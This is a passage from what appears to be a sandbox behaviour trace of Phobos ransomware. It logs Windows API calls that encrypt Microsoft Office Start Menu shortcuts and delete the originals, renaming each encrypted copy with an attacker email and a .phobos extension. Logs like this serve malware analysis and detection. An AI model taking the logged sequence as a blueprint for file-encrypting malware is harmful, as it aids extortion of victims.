CryptDestroyKey (hKey=0xa32968) returned 1 [0177.224] CloseHandle (hObject=0x190) returned 1 [0177.224] CloseHandle (hObject=0x158) returned 1 [0177.224] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk")) returned 1 [0177.225] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.225] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.226] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2875) returned 1 [0177.226] CloseHandle (hObject=0x158) returned 1 [0177.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk")) returned 0x20 [0177.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.226] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.226] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.226] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.226] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.227] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.227] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.227] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb3b, lpOverlapped=0x0) returned 1 [0177.229] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb40, dwBufLen=0xb40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb40) returned 1 [0177.229] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xb40, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xb40, lpOverlapped=0x0) returned 1 [0177.230] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0177.230] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.230] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0177.230] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.230] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0177.230] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.230] CloseHandle (hObject=0x158) returned 1 [0177.230] CloseHandle (hObject=0x190) returned 1 [0177.231] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk")) returned 1 [0177.232] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.232] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.232] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2999) returned 1 [0177.232] CloseHandle (hObject=0x190) returned 1 [0177.232] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk")) returned 0x20 [0177.233] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.233] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.233] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.233] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.233] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.234] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.234] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.234] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xbb7, lpOverlapped=0x0) returned 1 [0177.239] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbc0, dwBufLen=0xbc0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbc0) returned 1 [0177.239] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xbc0, lpOverlapped=0x0) returned 1 [0177.240] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ba8) returned 1 [0177.240] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.240] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80, dwBufLen=0x80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80) returned 1 [0177.240] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.240] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x132, lpOverlapped=0x0) returned 1 [0177.240] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.240] CloseHandle (hObject=0x190) returned 1 [0177.240] CloseHandle (hObject=0x158) returned 1 [0177.240] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk")) returned 1 [0177.242] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.242] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.242] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2879) returned 1 [0177.242] CloseHandle (hObject=0x158) returned 1 [0177.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk")) returned 0x20 [0177.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.242] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.242] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.242] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.242] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.243] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.243] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb3f, lpOverlapped=0x0) returned 1 [0177.249] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb40, dwBufLen=0xb40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb40) returned 1 [0177.249] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xb40, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xb40, lpOverlapped=0x0) returned 1 [0177.250] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32da8) returned 1 [0177.250] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.250] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0177.250] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.250] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0177.250] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.250] CloseHandle (hObject=0x158) returned 1 [0177.250] CloseHandle (hObject=0x190) returned 1 [0177.250] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk")) returned 1 [0177.251] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.251] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.252] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2937) returned 1 [0177.252] CloseHandle (hObject=0x190) returned 1 [0177.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk")) returned 0x20 [0177.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.252] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.252] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.253] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.253] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.253] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb79, lpOverlapped=0x0) returned 1 [0177.255] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb80, dwBufLen=0xb80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb80) returned 1 [0177.255] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xb80, lpOverlapped=0x0) returned 1 [0177.255] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32da8) returned 1 [0177.255] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.255] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0177.256] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.256] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0177.256] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.256] CloseHandle (hObject=0x190) returned 1 [0177.256] CloseHandle (hObject=0x158) returned 1 [0177.258] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk")) returned 1 [0177.259] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.260] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2935) returned 1 [0177.260] CloseHandle (hObject=0x158) returned 1 [0177.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk")) returned 0x20 [0177.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.260] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.260] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.261] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.261] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.261] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb77, lpOverlapped=0x0) returned 1 [0177.284] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb80, dwBufLen=0xb80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb80) returned 1 [0177.284] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xb80, lpOverlapped=0x0) returned 1 [0177.285] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ba8) returned 1 [0177.285] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.285] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0177.285] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.285] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0177.285] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.285] CloseHandle (hObject=0x158) returned 1 [0177.285] CloseHandle (hObject=0x190) returned 1 [0177.285] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk")) returned 1 [0177.287] 